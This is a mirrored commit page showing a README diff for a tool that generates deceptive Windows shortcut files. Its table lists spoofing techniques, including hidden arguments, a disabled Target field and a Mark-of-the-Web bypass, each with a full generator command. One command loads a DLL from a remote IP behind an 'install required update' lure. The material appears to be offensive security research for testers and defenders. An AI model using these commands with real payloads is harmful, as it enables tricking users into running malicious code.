mirror of
https://github.com/wietze/lnk-it-up
synced 2026-06-08 18:17:50 +00:00
Fix screenshot
This commit is contained in:
|
Before Width: | Height: | Size: 111 KiB After Width: | Height: | Size: 111 KiB |
@@ -20,7 +20,7 @@ Read more about this tool in the blog post [_Trust Me, I'm A Shortcut_](https://
|
||||
| `CVE20259491`<br>🟢 Arguments invisible<br>🔴 Shows real target EXE<br>🔴 Detected by Windows Defender | <img src="/docs/CVE20259491.jpg" alt="Screenshot" width="250" /> | `python3 -m lnk-generator.generate --target-executable "%COMSPEC%" --target-command-line "/c calc.exe" CVE20259491` |
|
||||
| `SPOOFEXE_OVERFLOWARGS_DISABLETARGET`<br>🟢 Spoofed target EXE<br>🟢 Arguments invisible<br>🔴 Requires Win 11 23H2 or earlier, requires double double-clicking to open<br>🔵 Target field disabled<br>🔵 Updates to true path after opening| <img src="/docs/SPOOFEXE_OVERFLOWARGS_DISABLETARGET.jpg" alt="Screenshot" width="250" /> | `python3 -m lnk-generator.generate --fake-path "C:\README.txt" --target-executable "c:\windows\system32\cmd.exe" --target-command-line "/c ping 127.0.0.1" --icon "%WINDIR%\System32\imageres.dll" --icon-index=97 SPOOFEXE_OVERFLOWARGS_DISABLETARGET` |
|
||||
| `SPOOFEXE_HIDEARGS_DISABLETARGET`<br>🟢 Spoofed target EXE<br>🟢 Arguments invisible<br>🔵 Target field disabled<br>🔵 Updates to true path after opening | <img src="/docs/SPOOFEXE_HIDEARGS_DISABLETARGET.jpg" alt="Screenshot" width="250" /> | `python3 -m lnk-generator.generate --fake-path "F:\USB Drive" --target-executable "%WINDIR%\System32\WindowsPowershell\v1.0\powershell.exe" --target-command-line "/ec ZQBjAGgAbwAgACIASABpACAAZgByAG8AbQAgAEAAVwBpAGUAdAB6AGUAIgA7ACAAcgBlAGEAZAAtAGgAbwBzAHQA" --icon "%WINDIR%\System32\shell32.dll" --icon-index=7 SPOOFEXE_HIDEARGS_DISABLETARGET` |
|
||||
| `SPOOFEXE_RUNDLL_DISABLETARGET`<br>🟢 Spoofed target EXE<br>🟢 Bypasses MotW on systems without [CVE-2026-21513](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2026-21513)<br>🔵 Executes DLLs only (either remote or local)<br>🔵 Target field disabled<br>🔴 Executes DLL via [RunDLL32 with shell32.dll](https://lolbas-project.github.io/lolbas/Libraries/Shell32/), which is easily detectable | <img src="/docs/SPOOFEXE_RUNDL.jpg" alt="Screenshot" width="250" /> | `python3 -m lnk-generator.generate --target-executable "\\\\123.45.67.89\calc.dll" --fake-path "Please open to install required update" --icon "%windir%\system32\imageres.dll" --icon-index 102 SPOOFEXE_RUNDLL_DISABLETARGET` |
|
||||
| `SPOOFEXE_RUNDLL_DISABLETARGET`<br>🟢 Spoofed target EXE<br>🟢 Bypasses MotW on systems without [CVE-2026-21513](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2026-21513)<br>🔵 Executes DLLs only (either remote or local)<br>🔵 Target field disabled<br>🔴 Executes DLL via [RunDLL32 with shell32.dll](https://lolbas-project.github.io/lolbas/Libraries/Shell32/), which is easily detectable | <img src="/docs/SPOOFEXE_RUNDLL_DISABLETARGET.jpg" alt="Screenshot" width="250" /> | `python3 -m lnk-generator.generate --target-executable "\\\\123.45.67.89\calc.dll" --fake-path "Please open to install required update" --icon "%windir%\system32\imageres.dll" --icon-index 102 SPOOFEXE_RUNDLL_DISABLETARGET` |
|
||||
|
||||
## Usage
|
||||
|
||||
|
||||
Reference in New Issue
Block a user